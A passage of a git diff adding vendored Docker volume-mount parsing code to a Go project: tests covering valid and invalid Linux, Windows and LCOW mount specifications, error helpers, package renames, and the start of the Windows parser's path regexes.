+		t.Logf("data=%q", data)
+		for _, s := range c.expectedSubstrings {
+			if !strings.Contains(data, s) {
+				t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c)
+			}
+		}
+		for _, s := range c.unexpectedSubstrings {
+			if strings.Contains(data, s) {
+				t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c)
+			}
+		}
+	}
+}
+
+type mockFiProvider struct{}
+
+func (mockFiProvider) fileInfo(path string) (exists, isDir bool, err error) {
+	dirs := map[string]struct{}{
+		`c:\`:                    {},
+		`c:\windows\`:            {},
+		`c:\windows`:             {},
+		`c:\program files`:       {},
+		`c:\Windows`:             {},
+		`c:\Program Files (x86)`: {},
+		`\\?\c:\windows\`:        {},
+	}
+	files := map[string]struct{}{
+		`c:\windows\system32\ntdll.dll`: {},
+	}
+	if _, ok := dirs[path]; ok {
+		return true, true, nil
+	}
+	if _, ok := files[path]; ok {
+		return true, false, nil
+	}
+	return false, false, nil
+}
+
+func TestParseMountRaw(t *testing.T) {
+
+	previousProvider := currentFileInfoProvider
+	defer func() { currentFileInfoProvider = previousProvider }()
+	currentFileInfoProvider = mockFiProvider{}
+	windowsSet := parseMountRawTestSet{
+		valid: []string{
+			`d:\`,
+			`d:`,
+			`d:\path`,
+			`d:\path with space`,
+			`c:\:d:\`,
+			`c:\windows\:d:`,
+			`c:\windows:d:\s p a c e`,
+			`c:\windows:d:\s p a c e:RW`,
+			`c:\program files:d:\s p a c e i n h o s t d i r`,
+			`0123456789name:d:`,
+			`MiXeDcAsEnAmE:d:`,
+			`name:D:`,
+			`name:D::rW`,
+			`name:D::RW`,
+			`name:D::RO`,
+			`c:/:d:/forward/slashes/are/good/too`,
+			`c:/:d:/including with/spaces:ro`,
+			`c:\Windows`,                // With capital
+			`c:\Program Files (x86)`,    // With capitals and brackets
+			`\\?\c:\windows\:d:`,        // Long path handling (source)
+			`c:\windows\:\\?\d:\`,       // Long path handling (target)
+			`\\.\pipe\foo:\\.\pipe\foo`, // named pipe
+			`//./pipe/foo://./pipe/foo`, // named pipe forward slashes
+		},
+		invalid: map[string]string{
+			``:                                 "invalid volume specification: ",
+			`.`:                                "invalid volume specification: ",
+			`..\`:                              "invalid volume specification: ",
+			`c:\:..\`:                          "invalid volume specification: ",
+			`c:\:d:\:xyzzy`:                    "invalid volume specification: ",
+			`c:`:                               "cannot be `c:`",
+			`c:\`:                              "cannot be `c:`",
+			`c:\notexist:d:`:                   `bind mount source path does not exist: c:\notexist`,
+			`c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`,
+			`name<:d:`:                         `invalid volume specification`,
+			`name>:d:`:                         `invalid volume specification`,
+			`name::d:`:                         `invalid volume specification`,
+			`name":d:`:                         `invalid volume specification`,
+			`name\:d:`:                         `invalid volume specification`,
+			`name*:d:`:                         `invalid volume specification`,
+			`name|:d:`:                         `invalid volume specification`,
+			`name?:d:`:                         `invalid volume specification`,
+			`name/:d:`:                         `invalid volume specification`,
+			`d:\pathandmode:rw`:                `invalid volume specification`,
+			`d:\pathandmode:ro`:                `invalid volume specification`,
+			`con:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`PRN:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`aUx:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`nul:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`com1:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com2:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com3:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com4:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com5:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com6:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com7:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com8:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com9:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt1:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt2:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt3:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt4:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt5:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt6:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt7:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt8:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt9:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`c:\windows\system32\ntdll.dll`:    `Only directories can be mapped on this platform`,
+			`\\.\pipe\foo:c:\pipe`:             `'c:\pipe' is not a valid pipe path`,
+		},
+	}
+	lcowSet := parseMountRawTestSet{
+		valid: []string{
+			`/foo`,
+			`/foo/`,
+			`/foo bar`,
+			`c:\:/foo`,
+			`c:\windows\:/foo`,
+			`c:\windows:/s p a c e`,
+			`c:\windows:/s p a c e:RW`,
+			`c:\program files:/s p a c e i n h o s t d i r`,
+			`0123456789name:/foo`,
+			`MiXeDcAsEnAmE:/foo`,
+			`name:/foo`,
+			`name:/foo:rW`,
+			`name:/foo:RW`,
+			`name:/foo:RO`,
+			`c:/:/forward/slashes/are/good/too`,
+			`c:/:/including with/spaces:ro`,
+			`/Program Files (x86)`, // With capitals and brackets
+		},
+		invalid: map[string]string{
+			``:                                   "invalid volume specification: ",
+			`.`:                                  "invalid volume specification: ",
+			`c:`:                                 "invalid volume specification: ",
+			`c:\`:                                "invalid volume specification: ",
+			`../`:                                "invalid volume specification: ",
+			`c:\:../`:                            "invalid volume specification: ",
+			`c:\:/foo:xyzzy`:                     "invalid volume specification: ",
+			`/`:                                  "destination can't be '/'",
+			`/..`:                                "destination can't be '/'",
+			`c:\notexist:/foo`:                   `bind mount source path does not exist: c:\notexist`,
+			`c:\windows\system32\ntdll.dll:/foo`: `source path must be a directory`,
+			`name<:/foo`:                         `invalid volume specification`,
+			`name>:/foo`:                         `invalid volume specification`,
+			`name::/foo`:                         `invalid volume specification`,
+			`name":/foo`:                         `invalid volume specification`,
+			`name\:/foo`:                         `invalid volume specification`,
+			`name*:/foo`:                         `invalid volume specification`,
+			`name|:/foo`:                         `invalid volume specification`,
+			`name?:/foo`:                         `invalid volume specification`,
+			`name/:/foo`:                         `invalid volume specification`,
+			`/foo:rw`:                            `invalid volume specification`,
+			`/foo:ro`:                            `invalid volume specification`,
+			`con:/foo`:                           `cannot be a reserved word for Windows filenames`,
+			`PRN:/foo`:                           `cannot be a reserved word for Windows filenames`,
+			`aUx:/foo`:                           `cannot be a reserved word for Windows filenames`,
+			`nul:/foo`:                           `cannot be a reserved word for Windows filenames`,
+			`com1:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com2:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com3:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com4:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com5:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com6:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com7:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com8:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`com9:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt1:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt2:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt3:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt4:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt5:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt6:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt7:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt8:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt9:/foo`:                          `cannot be a reserved word for Windows filenames`,
+			`\\.\pipe\foo:/foo`:                  `Linux containers on Windows do not support named pipe mounts`,
+		},
+	}
+	linuxSet := parseMountRawTestSet{
+		valid: []string{
+			"/home",
+			"/home:/home",
+			"/home:/something/else",
+			"/with space",
+			"/home:/with space",
+			"relative:/absolute-path",
+			"hostPath:/containerPath:ro",
+			"/hostPath:/containerPath:rw",
+			"/rw:/ro",
+			"/hostPath:/containerPath:shared",
+			"/hostPath:/containerPath:rshared",
+			"/hostPath:/containerPath:slave",
+			"/hostPath:/containerPath:rslave",
+			"/hostPath:/containerPath:private",
+			"/hostPath:/containerPath:rprivate",
+			"/hostPath:/containerPath:ro,shared",
+			"/hostPath:/containerPath:ro,slave",
+			"/hostPath:/containerPath:ro,private",
+			"/hostPath:/containerPath:ro,z,shared",
+			"/hostPath:/containerPath:ro,Z,slave",
+			"/hostPath:/containerPath:Z,ro,slave",
+			"/hostPath:/containerPath:slave,Z,ro",
+			"/hostPath:/containerPath:Z,slave,ro",
+			"/hostPath:/containerPath:slave,ro,Z",
+			"/hostPath:/containerPath:rslave,ro,Z",
+			"/hostPath:/containerPath:ro,rshared,Z",
+			"/hostPath:/containerPath:ro,Z,rprivate",
+		},
+		invalid: map[string]string{
+			"":                                "invalid volume specification",
+			"./":                              "mount path must be absolute",
+			"../":                             "mount path must be absolute",
+			"/:../":                           "mount path must be absolute",
+			"/:path":                          "mount path must be absolute",
+			":":                               "invalid volume specification",
+			"/tmp:":                           "invalid volume specification",
+			":test":                           "invalid volume specification",
+			":/test":                          "invalid volume specification",
+			"tmp:":                            "invalid volume specification",
+			":test:":                          "invalid volume specification",
+			"::":                              "invalid volume specification",
+			":::":                             "invalid volume specification",
+			"/tmp:::":                         "invalid volume specification",
+			":/tmp::":                         "invalid volume specification",
+			"/path:rw":                        "invalid volume specification",
+			"/path:ro":                        "invalid volume specification",
+			"/rw:rw":                          "invalid volume specification",
+			"path:ro":                         "invalid volume specification",
+			"/path:/path:sw":                  `invalid mode`,
+			"/path:/path:rwz":                 `invalid mode`,
+			"/path:/path:ro,rshared,rslave":   `invalid mode`,
+			"/path:/path:ro,z,rshared,rslave": `invalid mode`,
+			"/path:shared":                    "invalid volume specification",
+			"/path:slave":                     "invalid volume specification",
+			"/path:private":                   "invalid volume specification",
+			"name:/absolute-path:shared":      "invalid volume specification",
+			"name:/absolute-path:rshared":     "invalid volume specification",
+			"name:/absolute-path:slave":       "invalid volume specification",
+			"name:/absolute-path:rslave":      "invalid volume specification",
+			"name:/absolute-path:private":     "invalid volume specification",
+			"name:/absolute-path:rprivate":    "invalid volume specification",
+		},
+	}
+
+	linParser := &linuxParser{}
+	winParser := &windowsParser{}
+	lcowParser := &lcowParser{}
+	tester := func(parser Parser, set parseMountRawTestSet) {
+
+		for _, path := range set.valid {
+
+			if _, err := parser.ParseMountRaw(path, "local"); err != nil {
+				t.Errorf("ParseMountRaw(`%q`) should succeed: error %q", path, err)
+			}
+		}
+
+		for path, expectedError := range set.invalid {
+			if mp, err := parser.ParseMountRaw(path, "local"); err == nil {
+				t.Errorf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp)
+			} else {
+				if !strings.Contains(err.Error(), expectedError) {
+					t.Errorf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error())
+				}
+			}
+		}
+	}
+	tester(linParser, linuxSet)
+	tester(winParser, windowsSet)
+	tester(lcowParser, lcowSet)
+
+}
+
+// testParseMountRaw is a structure used by TestParseMountRawSplit for
+// specifying test cases for the ParseMountRaw() function.
+type testParseMountRaw struct {
+	bind      string
+	driver    string
+	expType   mount.Type
+	expDest   string
+	expSource string
+	expName   string
+	expDriver string
+	expRW     bool
+	fail      bool
+}
+
+func TestParseMountRawSplit(t *testing.T) {
+	previousProvider := currentFileInfoProvider
+	defer func() { currentFileInfoProvider = previousProvider }()
+	currentFileInfoProvider = mockFiProvider{}
+	windowsCases := []testParseMountRaw{
+		{`c:\:d:`, "local", mount.TypeBind, `d:`, `c:\`, ``, "", true, false},
+		{`c:\:d:\`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", true, false},
+		{`c:\:d:\:ro`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", false, false},
+		{`c:\:d:\:rw`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", true, false},
+		{`c:\:d:\:foo`, "local", mount.TypeBind, `d:\`, `c:\`, ``, "", false, true},
+		{`name:d::rw`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", true, false},
+		{`name:d:`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", true, false},
+		{`name:d::ro`, "local", mount.TypeVolume, `d:`, ``, `name`, "local", false, false},
+		{`name:c:`, "", mount.TypeVolume, ``, ``, ``, "", true, true},
+		{`driver/name:c:`, "", mount.TypeVolume, ``, ``, ``, "", true, true},
+		{`\\.\pipe\foo:\\.\pipe\bar`, "local", mount.TypeNamedPipe, `\\.\pipe\bar`, `\\.\pipe\foo`, "", "", true, false},
+		{`\\.\pipe\foo:c:\foo\bar`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true},
+		{`c:\foo\bar:\\.\pipe\foo`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true},
+	}
+	lcowCases := []testParseMountRaw{
+		{`c:\:/foo`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", true, false},
+		{`c:\:/foo:ro`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", false, false},
+		{`c:\:/foo:rw`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", true, false},
+		{`c:\:/foo:foo`, "local", mount.TypeBind, `/foo`, `c:\`, ``, "", false, true},
+		{`name:/foo:rw`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", true, false},
+		{`name:/foo`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", true, false},
+		{`name:/foo:ro`, "local", mount.TypeVolume, `/foo`, ``, `name`, "local", false, false},
+		{`name:/`, "", mount.TypeVolume, ``, ``, ``, "", true, true},
+		{`driver/name:/`, "", mount.TypeVolume, ``, ``, ``, "", true, true},
+		{`\\.\pipe\foo:\\.\pipe\bar`, "local", mount.TypeNamedPipe, `\\.\pipe\bar`, `\\.\pipe\foo`, "", "", true, true},
+		{`\\.\pipe\foo:/data`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true},
+		{`c:\foo\bar:\\.\pipe\foo`, "local", mount.TypeNamedPipe, ``, ``, "", "", true, true},
+	}
+	linuxCases := []testParseMountRaw{
+		{"/tmp:/tmp1", "", mount.TypeBind, "/tmp1", "/tmp", "", "", true, false},
+		{"/tmp:/tmp2:ro", "", mount.TypeBind, "/tmp2", "/tmp", "", "", false, false},
+		{"/tmp:/tmp3:rw", "", mount.TypeBind, "/tmp3", "/tmp", "", "", true, false},
+		{"/tmp:/tmp4:foo", "", mount.TypeBind, "", "", "", "", false, true},
+		{"name:/named1", "", mount.TypeVolume, "/named1", "", "name", "", true, false},
+		{"name:/named2", "external", mount.TypeVolume, "/named2", "", "name", "external", true, false},
+		{"name:/named3:ro", "local", mount.TypeVolume, "/named3", "", "name", "local", false, false},
+		{"local/name:/tmp:rw", "", mount.TypeVolume, "/tmp", "", "local/name", "", true, false},
+		{"/tmp:tmp", "", mount.TypeBind, "", "", "", "", true, true},
+	}
+	linParser := &linuxParser{}
+	winParser := &windowsParser{}
+	lcowParser := &lcowParser{}
+	tester := func(parser Parser, cases []testParseMountRaw) {
+		for i, c := range cases {
+			t.Logf("case %d", i)
+			m, err := parser.ParseMountRaw(c.bind, c.driver)
+			if c.fail {
+				if err == nil {
+					t.Errorf("Expected error, was nil, for spec %s\n", c.bind)
+				}
+				continue
+			}
+
+			if m == nil || err != nil {
+				t.Errorf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error())
+				continue
+			}
+
+			if m.Destination != c.expDest {
+				t.Errorf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind)
+			}
+
+			if m.Source != c.expSource {
+				t.Errorf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind)
+			}
+
+			if m.Name != c.expName {
+				t.Errorf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind)
+			}
+
+			if m.Driver != c.expDriver {
+				t.Errorf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind)
+			}
+
+			if m.RW != c.expRW {
+				t.Errorf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind)
+			}
+			if m.Type != c.expType {
+				t.Fatalf("Expected type '%s', was '%s', for spec '%s'", c.expType, m.Type, c.bind)
+			}
+		}
+	}
+
+	tester(linParser, linuxCases)
+	tester(winParser, windowsCases)
+	tester(lcowParser, lcowCases)
+}
+
+func TestParseMountSpec(t *testing.T) {
+	type c struct {
+		input    mount.Mount
+		expected MountPoint
+	}
+	testDir, err := ioutil.TempDir("", "test-mount-config")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(testDir)
+	parser := NewParser(runtime.GOOS)
+	cases := []c{
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}},
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, RW: true, Propagation: parser.DefaultPropagationMode()}},
+		{mount.Mount{Type: mount.TypeBind, Source: testDir + string(os.PathSeparator), Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}},
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath + string(os.PathSeparator), ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath, Propagation: parser.DefaultPropagationMode()}},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: parser.DefaultCopyMode()}},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath + string(os.PathSeparator)}, MountPoint{Type: mount.TypeVolume, Destination: testDestinationPath, RW: true, CopyData: parser.DefaultCopyMode()}},
+	}
+
+	for i, c := range cases {
+		t.Logf("case %d", i)
+		mp, err := parser.ParseMountSpec(c.input)
+		if err != nil {
+			t.Error(err)
+		}
+
+		if c.expected.Type != mp.Type {
+			t.Errorf("Expected mount types to match. Expected: '%s', Actual: '%s'", c.expected.Type, mp.Type)
+		}
+		if c.expected.Destination != mp.Destination {
+			t.Errorf("Expected mount destination to match. Expected: '%s', Actual: '%s'", c.expected.Destination, mp.Destination)
+		}
+		if c.expected.Source != mp.Source {
+			t.Errorf("Expected mount source to match. Expected: '%s', Actual: '%s'", c.expected.Source, mp.Source)
+		}
+		if c.expected.RW != mp.RW {
+			t.Errorf("Expected mount writable to match. Expected: '%v', Actual: '%v'", c.expected.RW, mp.RW)
+		}
+		if c.expected.Propagation != mp.Propagation {
+			t.Errorf("Expected mount propagation to match. Expected: '%v', Actual: '%s'", c.expected.Propagation, mp.Propagation)
+		}
+		if c.expected.Driver != mp.Driver {
+			t.Errorf("Expected mount driver to match. Expected: '%v', Actual: '%s'", c.expected.Driver, mp.Driver)
+		}
+		if c.expected.CopyData != mp.CopyData {
+			t.Errorf("Expected mount copy data to match. Expected: '%v', Actual: '%v'", c.expected.CopyData, mp.CopyData)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/validate.go b/vendor/github.com/docker/docker/volume/mounts/validate.go
new file mode 100644
index 0000000000..0b71526901
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/validate.go
@@ -0,0 +1,28 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"fmt"
+
+	"github.com/docker/docker/api/types/mount"
+	"github.com/pkg/errors"
+)
+
+type errMountConfig struct {
+	mount *mount.Mount
+	err   error
+}
+
+func (e *errMountConfig) Error() string {
+	return fmt.Sprintf("invalid mount config for type %q: %v", e.mount.Type, e.err.Error())
+}
+
+func errBindSourceDoesNotExist(path string) error {
+	return errors.Errorf("bind mount source path does not exist: %s", path)
+}
+
+func errExtraField(name string) error {
+	return errors.Errorf("field %s must not be specified", name)
+}
+func errMissingField(name string) error {
+	return errors.Errorf("field %s must not be empty", name)
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/validate_test.go b/vendor/github.com/docker/docker/volume/mounts/validate_test.go
new file mode 100644
index 0000000000..4f83856043
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/validate_test.go
@@ -0,0 +1,73 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"errors"
+	"io/ioutil"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+func TestValidateMount(t *testing.T) {
+	testDir, err := ioutil.TempDir("", "test-validate-mount")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(testDir)
+
+	cases := []struct {
+		input    mount.Mount
+		expected error
+	}{
+		{mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath, Source: "hello"}, nil},
+		{mount.Mount{Type: mount.TypeVolume, Target: testDestinationPath}, nil},
+		{mount.Mount{Type: mount.TypeBind}, errMissingField("Target")},
+		{mount.Mount{Type: mount.TypeBind, Target: testDestinationPath}, errMissingField("Source")},
+		{mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")},
+
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil},
+		{mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")},
+		{mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindSourceDoesNotExist(testSourcePath)},
+	}
+
+	lcowCases := []struct {
+		input    mount.Mount
+		expected error
+	}{
+		{mount.Mount{Type: mount.TypeVolume}, errMissingField("Target")},
+		{mount.Mount{Type: mount.TypeVolume, Target: "/foo", Source: "hello"}, nil},
+		{mount.Mount{Type: mount.TypeVolume, Target: "/foo"}, nil},
+		{mount.Mount{Type: mount.TypeBind}, errMissingField("Target")},
+		{mount.Mount{Type: mount.TypeBind, Target: "/foo"}, errMissingField("Source")},
+		{mount.Mount{Type: mount.TypeBind, Target: "/foo", Source: "c:\\foo", VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")},
+		{mount.Mount{Type: mount.TypeBind, Source: "c:\\foo", Target: "/foo"}, errBindSourceDoesNotExist("c:\\foo")},
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: "/foo"}, nil},
+		{mount.Mount{Type: "invalid", Target: "/foo"}, errors.New("mount type unknown")},
+	}
+	parser := NewParser(runtime.GOOS)
+	for i, x := range cases {
+		err := parser.ValidateMountConfig(&x.input)
+		if err == nil && x.expected == nil {
+			continue
+		}
+		if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) {
+			t.Errorf("expected %q, got %q, case: %d", x.expected, err, i)
+		}
+	}
+	if runtime.GOOS == "windows" {
+		parser = &lcowParser{}
+		for i, x := range lcowCases {
+			err := parser.ValidateMountConfig(&x.input)
+			if err == nil && x.expected == nil {
+				continue
+			}
+			if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) {
+				t.Errorf("expected %q, got %q, case: %d", x.expected, err, i)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/validate_test_unix.go b/vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go
similarity index 57%
rename from vendor/github.com/docker/docker/volume/validate_test_unix.go
rename to vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go
index dd1de2f643..a319371451 100644
--- a/vendor/github.com/docker/docker/volume/validate_test_unix.go
+++ b/vendor/github.com/docker/docker/volume/mounts/validate_unix_test.go
@@ -1,6 +1,6 @@
 // +build !windows
 
-package volume
+package mounts // import "github.com/docker/docker/volume/mounts"
 
 var (
 	testDestinationPath = "/foo"
diff --git a/vendor/github.com/docker/docker/volume/validate_test_windows.go b/vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go
similarity index 52%
rename from vendor/github.com/docker/docker/volume/validate_test_windows.go
rename to vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go
index d5f86ac850..74b40a6c30 100644
--- a/vendor/github.com/docker/docker/volume/validate_test_windows.go
+++ b/vendor/github.com/docker/docker/volume/mounts/validate_windows_test.go
@@ -1,4 +1,4 @@
-package volume
+package mounts // import "github.com/docker/docker/volume/mounts"
 
 var (
 	testDestinationPath = `c:\foo`
diff --git a/vendor/github.com/docker/docker/volume/volume_copy.go b/vendor/github.com/docker/docker/volume/mounts/volume_copy.go
similarity index 73%
rename from vendor/github.com/docker/docker/volume/volume_copy.go
rename to vendor/github.com/docker/docker/volume/mounts/volume_copy.go
index 77f06a0d1f..04056fa50a 100644
--- a/vendor/github.com/docker/docker/volume/volume_copy.go
+++ b/vendor/github.com/docker/docker/volume/mounts/volume_copy.go
@@ -1,4 +1,4 @@
-package volume
+package mounts // import "github.com/docker/docker/volume/mounts"
 
 import "strings"
 
@@ -13,11 +13,11 @@ func copyModeExists(mode string) bool {
 }
 
 // GetCopyMode gets the copy mode from the mode string for mounts
-func getCopyMode(mode string) (bool, bool) {
+func getCopyMode(mode string, def bool) (bool, bool) {
 	for _, o := range strings.Split(mode, ",") {
 		if isEnabled, exists := copyModes[o]; exists {
 			return isEnabled, true
 		}
 	}
-	return DefaultCopyMode, false
+	return def, false
 }
diff --git a/vendor/github.com/docker/docker/volume/mounts/volume_unix.go b/vendor/github.com/docker/docker/volume/mounts/volume_unix.go
new file mode 100644
index 0000000000..c6d51e0710
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/volume_unix.go
@@ -0,0 +1,18 @@
+// +build linux freebsd darwin
+
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"fmt"
+	"path/filepath"
+	"strings"
+)
+
+func (p *linuxParser) HasResource(m *MountPoint, absolutePath string) bool {
+	relPath, err := filepath.Rel(m.Destination, absolutePath)
+	return err == nil && relPath != ".." && !strings.HasPrefix(relPath, fmt.Sprintf("..%c", filepath.Separator))
+}
+
+func (p *windowsParser) HasResource(m *MountPoint, absolutePath string) bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/volume_windows.go b/vendor/github.com/docker/docker/volume/mounts/volume_windows.go
new file mode 100644
index 0000000000..773e7db88a
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/volume_windows.go
@@ -0,0 +1,8 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+func (p *windowsParser) HasResource(m *MountPoint, absolutePath string) bool {
+	return false
+}
+func (p *linuxParser) HasResource(m *MountPoint, absolutePath string) bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/volume/mounts/windows_parser.go b/vendor/github.com/docker/docker/volume/mounts/windows_parser.go
new file mode 100644
index 0000000000..ac61044043
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/mounts/windows_parser.go
@@ -0,0 +1,456 @@
+package mounts // import "github.com/docker/docker/volume/mounts"
+
+import (
+	"errors"
+	"fmt"
+	"os"
+	"regexp"
+	"runtime"
+	"strings"
+
+	"github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/pkg/stringid"
+)
+
+type windowsParser struct {
+}
+
+const (
+	// Spec should be in the format [source:]destination[:mode]
+	//
+	// Examples: c:\foo bar:d:rw
+	//           c:\foo:d:\bar
+	//           myname:d:
+	//           d:\
+	//
+	// Explanation of this regex! Thanks @thaJeztah on IRC and gist for help. See
+	// https://gist.github.com/thaJeztah/6185659e4978789fb2b2. A good place to
+	// test is https://regex-golang.appspot.com/assets/html/index.html
+	//
+	// Useful link for referencing named capturing groups:
+	// http://stackoverflow.com/questions/20750843/using-named-matches-from-go-regex
+	//
+	// There are three match groups: source, destination and mode.
+	//
+
+	// rxHostDir is the first option of a source
+	rxHostDir = `(?:\\\\\?\\)?[a-z]:[\\/](?:[^\\/:*?"<>|\r\n]+[\\/]?)*`
+	// rxName is the second option of a source
+	rxName = `[^\\/:*?"<>|\r\n]+`
+
+	// RXReservedNames are reserved names not possible on Windows
+	rxReservedNames = `(con)|(prn)|(nul)|(aux)|(com[1-9])|(lpt[1-9])`
+
+	// rxPipe is a named path pipe (starts with `\\.\pipe\`, possibly with / instead of \)
+	rxPipe = `[/\\]{2}.[/\\]pipe[/\\][^:*?"<>|\r\n]+`
+	// rxSource is the combined possibilities for a source
+	rxSource = `((?P<source>((` + rxHostDir + `)|(` + rxName + `)|(` + rxPipe + `))):)?`
+
+	// Source. Can be either a host directory, a name, or omitted:
+	//  HostDir:
+	//    -  Essentially using the folder solution from
+	//       https://www.safaribooksonline.com/library/view/regular-expressions-cookbook/9781449327453/ch08s18.html
+	//       but adding case insensitivity.
+	//    -  Must be an absolute path such as c:\path
+	//    -  Can include spaces such as `c:\program files`
+	//    -  And then followed by a colon which is not in the capture group
+	//    -  And can be optional
+	//  Name:
+	//    -  Must not contain invalid NTFS filename characters (https://msdn.microsoft.com/en-us/library/windows/desktop/aa365247(v=vs.85).aspx)
+	//    -  And then followed by a colon which is not in the capture group
+	//    -  And can be optional
+
+	// rxDestination is the regex expression for the mount destination
